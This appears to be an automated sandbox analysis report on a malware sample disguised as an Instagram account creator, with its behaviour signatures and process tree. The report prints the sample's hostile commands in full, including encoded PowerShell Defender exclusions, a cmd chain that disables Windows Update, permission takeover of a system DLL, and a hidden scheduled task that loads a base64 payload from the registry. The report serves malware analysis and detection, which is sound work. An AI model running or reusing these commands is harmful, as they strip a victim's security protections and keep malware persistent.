2bbf2e073912caf5e14068311b9fdd384e2e3ba18926e6e970be32968f3f044d

Analysis

max time kernel
139s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
06-12-2022 15:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

InstagramAccountCreator.exe
Size

50.2MB
MD5

26f0227e22e82d1bb4b670a57a33f2e4
SHA1

c6ce6febe356e5fcb0edfaf78f1d7f47d73c670e
SHA256

2bbf2e073912caf5e14068311b9fdd384e2e3ba18926e6e970be32968f3f044d
SHA512

b66b1da5cc53307179d6102b053a78103cbadfa949cbdcd8a18dd4507b7422a673eb8e5af4c70ece1e1223005b21f2bbac4d561f66db69193ca28d6a29530401
SSDEEP

786432:nagctlsdx7hxfhCvQhR0+YkqgQkvs2nI+W1/FYtKUi5rum7Xu8+iG9sixXHcf:aJtlsdx7h3Ws0GNI+JKUi5KHxiKsmHc

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Executes dropped EXE 7 IoCs

Processes:

InstagramAccountCreator.exeLoader.exeClient.exebuild.exeStrike.exeBlitz Services.exeVision.exe

pid process

1532 InstagramAccountCreator.exe
828 Loader.exe
664 Client.exe
1804 build.exe
604 Strike.exe
1356 Blitz Services.exe
1776 Vision.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1704 takeown.exe
1612 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 7 IoCs

Processes:

InstagramAccountCreator.exeLoader.exetaskeng.exe

pid process

1256 InstagramAccountCreator.exe
1256 InstagramAccountCreator.exe
828 Loader.exe
828 Loader.exe
828 Loader.exe
828 Loader.exe
1524 taskeng.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1704 takeown.exe
1612 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
1532	InstagramAccountCreator.exe
828	Loader.exe
664	Client.exe
1804	build.exe
604	Strike.exe
1356	Blitz Services.exe
1776	Vision.exe

pid	process
1704	takeown.exe
1612	icacls.exe

pid	process
1256	InstagramAccountCreator.exe
1256	InstagramAccountCreator.exe
828	Loader.exe
828	Loader.exe
828	Loader.exe
828	Loader.exe
1524	taskeng.exe

pid	process
1704	takeown.exe
1612	icacls.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 2 IoCs

Processes:

Client.exe

description	ioc	process
File created	C:\Program Files\Vision Applications\Vision.exe	Client.exe
File opened for modification	C:\Program Files\Vision Applications\Vision.exe	Client.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

632 sc.exe
1104 sc.exe
520 sc.exe
1680 sc.exe
700 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

316 schtasks.exe
1620 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

868 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

864 taskkill.exe

pid	process
632	sc.exe
1104	sc.exe
520	sc.exe
1680	sc.exe
700	sc.exe

pid	process
316	schtasks.exe
1620	schtasks.exe

pid	process
868	timeout.exe

pid	process
864	taskkill.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

Vision.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Vision.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	Vision.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	Vision.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 708f5f689009d901	powershell.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1852 reg.exe
1992 reg.exe
912 reg.exe
1304 reg.exe
1432 reg.exe
1264 reg.exe
1640 reg.exe
1836 reg.exe
1856 reg.exe

pid	process
1852	reg.exe
1992	reg.exe
912	reg.exe
1304	reg.exe
1432	reg.exe
1264	reg.exe
1640	reg.exe
1836	reg.exe
1856	reg.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

InstagramAccountCreator.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	InstagramAccountCreator.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	InstagramAccountCreator.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	InstagramAccountCreator.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	InstagramAccountCreator.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeClient.exepowershell.exe

pid process

1956 powershell.exe
920 powershell.exe
952 powershell.exe
664 Client.exe
1780 powershell.exe

pid	process
1956	powershell.exe
920	powershell.exe
952	powershell.exe
664	Client.exe
1780	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

InstagramAccountCreator.exeStrike.exepowershell.exepowershell.exeBlitz Services.exepowershell.exebuild.exetaskkill.exetakeown.exeClient.exepowershell.exe

description	pid	process
Token: 33	1532	InstagramAccountCreator.exe
Token: SeIncBasePriorityPrivilege	1532	InstagramAccountCreator.exe
Token: SeDebugPrivilege	604	Strike.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	1356	Blitz Services.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	1804	build.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeTakeOwnershipPrivilege	1704	takeown.exe
Token: SeDebugPrivilege	664	Client.exe
Token: SeDebugPrivilege	1780	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

InstagramAccountCreator.exeLoader.exeClient.exeBlitz Services.exebuild.execmd.execmd.exe

description	pid	process	target process
PID 1256 wrote to memory of 1956	1256	InstagramAccountCreator.exe	powershell.exe
PID 1256 wrote to memory of 1956	1256	InstagramAccountCreator.exe	powershell.exe
PID 1256 wrote to memory of 1956	1256	InstagramAccountCreator.exe	powershell.exe
PID 1256 wrote to memory of 1956	1256	InstagramAccountCreator.exe	powershell.exe
PID 1256 wrote to memory of 1532	1256	InstagramAccountCreator.exe	InstagramAccountCreator.exe
PID 1256 wrote to memory of 1532	1256	InstagramAccountCreator.exe	InstagramAccountCreator.exe
PID 1256 wrote to memory of 1532	1256	InstagramAccountCreator.exe	InstagramAccountCreator.exe
PID 1256 wrote to memory of 1532	1256	InstagramAccountCreator.exe	InstagramAccountCreator.exe
PID 1256 wrote to memory of 828	1256	InstagramAccountCreator.exe	Loader.exe
PID 1256 wrote to memory of 828	1256	InstagramAccountCreator.exe	Loader.exe
PID 1256 wrote to memory of 828	1256	InstagramAccountCreator.exe	Loader.exe
PID 1256 wrote to memory of 828	1256	InstagramAccountCreator.exe	Loader.exe
PID 828 wrote to memory of 920	828	Loader.exe	powershell.exe
PID 828 wrote to memory of 920	828	Loader.exe	powershell.exe
PID 828 wrote to memory of 920	828	Loader.exe	powershell.exe
PID 828 wrote to memory of 920	828	Loader.exe	powershell.exe
PID 828 wrote to memory of 664	828	Loader.exe	Client.exe
PID 828 wrote to memory of 664	828	Loader.exe	Client.exe
PID 828 wrote to memory of 664	828	Loader.exe	Client.exe
PID 828 wrote to memory of 664	828	Loader.exe	Client.exe
PID 828 wrote to memory of 1804	828	Loader.exe	build.exe
PID 828 wrote to memory of 1804	828	Loader.exe	build.exe
PID 828 wrote to memory of 1804	828	Loader.exe	build.exe
PID 828 wrote to memory of 1804	828	Loader.exe	build.exe
PID 828 wrote to memory of 604	828	Loader.exe	Strike.exe
PID 828 wrote to memory of 604	828	Loader.exe	Strike.exe
PID 828 wrote to memory of 604	828	Loader.exe	Strike.exe
PID 828 wrote to memory of 604	828	Loader.exe	Strike.exe
PID 828 wrote to memory of 1356	828	Loader.exe	Blitz Services.exe
PID 828 wrote to memory of 1356	828	Loader.exe	Blitz Services.exe
PID 828 wrote to memory of 1356	828	Loader.exe	Blitz Services.exe
PID 828 wrote to memory of 1356	828	Loader.exe	Blitz Services.exe
PID 664 wrote to memory of 952	664	Client.exe	powershell.exe
PID 664 wrote to memory of 952	664	Client.exe	powershell.exe
PID 664 wrote to memory of 952	664	Client.exe	powershell.exe
PID 1356 wrote to memory of 316	1356	Blitz Services.exe	schtasks.exe
PID 1356 wrote to memory of 316	1356	Blitz Services.exe	schtasks.exe
PID 1356 wrote to memory of 316	1356	Blitz Services.exe	schtasks.exe
PID 1356 wrote to memory of 316	1356	Blitz Services.exe	schtasks.exe
PID 1804 wrote to memory of 1880	1804	build.exe	cmd.exe
PID 1804 wrote to memory of 1880	1804	build.exe	cmd.exe
PID 1804 wrote to memory of 1880	1804	build.exe	cmd.exe
PID 1804 wrote to memory of 1880	1804	build.exe	cmd.exe
PID 1880 wrote to memory of 1856	1880	cmd.exe	chcp.com
PID 1880 wrote to memory of 1856	1880	cmd.exe	chcp.com
PID 1880 wrote to memory of 1856	1880	cmd.exe	chcp.com
PID 1880 wrote to memory of 1856	1880	cmd.exe	chcp.com
PID 1880 wrote to memory of 864	1880	cmd.exe	taskkill.exe
PID 1880 wrote to memory of 864	1880	cmd.exe	taskkill.exe
PID 1880 wrote to memory of 864	1880	cmd.exe	taskkill.exe
PID 1880 wrote to memory of 864	1880	cmd.exe	taskkill.exe
PID 1880 wrote to memory of 868	1880	cmd.exe	timeout.exe
PID 1880 wrote to memory of 868	1880	cmd.exe	timeout.exe
PID 1880 wrote to memory of 868	1880	cmd.exe	timeout.exe
PID 1880 wrote to memory of 868	1880	cmd.exe	timeout.exe
PID 664 wrote to memory of 1340	664	Client.exe	cmd.exe
PID 664 wrote to memory of 1340	664	Client.exe	cmd.exe
PID 664 wrote to memory of 1340	664	Client.exe	cmd.exe
PID 1340 wrote to memory of 632	1340	cmd.exe	sc.exe
PID 1340 wrote to memory of 632	1340	cmd.exe	sc.exe
PID 1340 wrote to memory of 632	1340	cmd.exe	sc.exe
PID 1340 wrote to memory of 1104	1340	cmd.exe	sc.exe
PID 1340 wrote to memory of 1104	1340	cmd.exe	sc.exe
PID 1340 wrote to memory of 1104	1340	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\InstagramAccountCreator.exe
"C:\Users\Admin\AppData\Local\Temp\InstagramAccountCreator.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAdAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAYgByACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe
"C:\Users\Admin\AppData\Roaming\InstagramAccountCreator.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Users\Admin\AppData\Roaming\Loader.exe
"C:\Users\Admin\AppData\Roaming\Loader.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAbgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcABzACMAPgA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Users\Admin\AppData\Roaming\Client.exe
"C:\Users\Admin\AppData\Roaming\Client.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZABpAGMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcwB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAYgB3AGkAIwA+AA=="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:632

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1104

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:520

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1680

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:700

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1264

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:1992

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1836

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1612

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1304

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1432

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1852

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1856

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1728

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1760

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:580

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1508

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1356

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Visions" /tr "\"C:\Program Files\Vision Applications\Vision.exe\""
4⤵
PID:1764

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Visions" /tr "\"C:\Program Files\Vision Applications\Vision.exe\""
5⤵
- Creates scheduled task(s)
PID:1620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Visions"
4⤵
PID:684

C:\Windows\system32\schtasks.exe
schtasks /run /tn "Visions"
5⤵
PID:848

C:\Users\Admin\AppData\Roaming\build.exe
"C:\Users\Admin\AppData\Roaming\build.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp84EA.tmp.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:1880

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:1856

C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 1804
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
5⤵
- Delays execution with timeout.exe
PID:868

C:\Users\Admin\AppData\Roaming\Strike.exe
"C:\Users\Admin\AppData\Roaming\Strike.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:604

C:\Users\Admin\AppData\Roaming\Blitz Services.exe
"C:\Users\Admin\AppData\Roaming\Blitz Services.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 5 /tn Ovygm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Ovygm\).Spwwgq)).EntryPoint.Invoke($Null,$Null)"
4⤵
